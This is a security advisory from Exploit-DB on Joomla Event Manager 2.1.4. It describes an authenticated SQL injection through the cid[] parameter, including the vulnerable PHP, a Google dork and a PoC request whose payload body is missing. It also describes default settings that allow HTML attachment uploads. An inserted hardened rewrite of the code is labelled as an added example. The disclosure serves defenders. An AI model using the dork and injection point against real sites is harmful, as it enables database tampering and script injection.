Joomla Event Manager 2.1.4 - Multiple Vulnerabilities

ID EDB-ID:37767
Type exploitdb
Reporter Martino Sani
Modified 2015-08-13T00:00:00


Joomla Event Manager 2.1.4 - Multiple Vulnerabilities. Webapps exploit for multiple platforms

# Exploit Title: Joomla Event Manager 2.1.4 - Multiple Vulnerabilities
# Google Dork: inurl:option=com_jem
# Date: 08-12-2015
# Author: Martino Sani
# Vendor Homepage:
# Software Link:
# Version: 2.1.4
# CVE: -


##1 SQL Injection

  Resource: index.php?option=com_jem&view=myevents
  Parameter: cid

  An authenticated user can execute arbitrary SQL queries via SQL injection in the functionality that publishes/unpublishes an event: the event ids are concatenated into the query without being cast or escaped.

### Source Code

  File: sites/models/myevents.php

  function publish($cid = array(), $publish = 1)
  {
     if (is_array($cid) && count($cid)) {
        // Values from the cid[] request parameter are joined verbatim,
        // so a non-numeric element lands unescaped inside the IN (...) list.
        $cids = implode(',', $cid);
        $query = 'UPDATE #__jem_events'
           . ' SET published = '. (int) $publish
           . ' WHERE id IN ('. $cids .')'
           . ' AND (checked_out = 0 OR (checked_out = ' .$userid. '))';
        // the query is then executed (remainder of the method not reproduced in the advisory)
     }
  }
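A hardened form of the same query builder, added here as an example and not JEM's or the vendor's fix; it assumes the Joomla 3 database API (JFactory::getDbo(), quoteName(), setQuery(), execute()) and that $userid is the id of the current user.

```php
<?php
// Added example (not JEM's own code): every id is forced to a positive
// integer before it reaches the IN (...) list, so the cid[] array can no
// longer carry SQL fragments. Assumes the Joomla 3 database API.

/**
 * Build the UPDATE statement from an already-validated id list.
 * Returns null when no valid id remains, so the caller can refuse the request.
 */
function buildPublishQuery(array $cid, $publish, $userid, $db)
{
    // intval() turns any non-numeric element into 0, which is then dropped.
    $ids = array_filter(array_map('intval', $cid), function ($id) {
        return $id > 0;
    });

    if (empty($ids)) {
        return null;
    }

    return 'UPDATE ' . $db->quoteName('#__jem_events')
        . ' SET ' . $db->quoteName('published') . ' = ' . (int) $publish
        . ' WHERE ' . $db->quoteName('id') . ' IN (' . implode(',', $ids) . ')'
        . ' AND (' . $db->quoteName('checked_out') . ' = 0'
        . ' OR ' . $db->quoteName('checked_out') . ' = ' . (int) $userid . ')';
}

/**
 * Drop-in replacement with the same signature as the vulnerable publish().
 */
function publish($cid = array(), $publish = 1)
{
    $db     = JFactory::getDbo();
    $userid = (int) JFactory::getUser()->get('id');

    $query = buildPublishQuery((array) $cid, $publish, $userid, $db);
    if ($query === null) {
        return false; // nothing valid to update
    }

    $db->setQuery($query);

    return (bool) $db->execute();
}
```

With this change a request whose cid[] contains anything other than positive integers either updates only the numeric ids or is rejected outright, which is the behaviour to verify when testing the vendor's fixed branch.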

### PoC

  POST /joomla3.4.3/index.php?option=com_jem&view=myevents&Itemid=151 HTTP/1.1
  User-Agent: Mozilla/5.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Cookie: 55cfbe406ffe44b0159d9a943820d207=gauuoq0rqlakkltqj4dd1mpd76; jpanesliders_stat-pane=0; jpanesliders_event-sliders-10=2; d6300469df4ad94ccc019d02bc74f647=4339lu3g2tn4lhg2lvgd8ft263
  Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 352


##2 Insecure File Upload

  The default JEM settings allow HTML/HTM files to be uploaded as event attachments.
  An authenticated attacker could upload HTML/HTM files containing malicious code (e.g. JavaScript).
  These attachments could be reachable at "<website>/media/com_jem/attachments/event/event[id]/" or downloaded and executed locally by the victim's browser.

  Attachment processing is handled by the "/site/classes/attachments.class.php" file.
  The file types allowed by default are defined in the "/admin/sql/install.mysql.utf.sql" file.
  08-01-2015: Vendor notification.
  08-12-2015: Vendor fixes the issues in the development branch.

  The author is not responsible for the misuse of the information provided in this security advisory.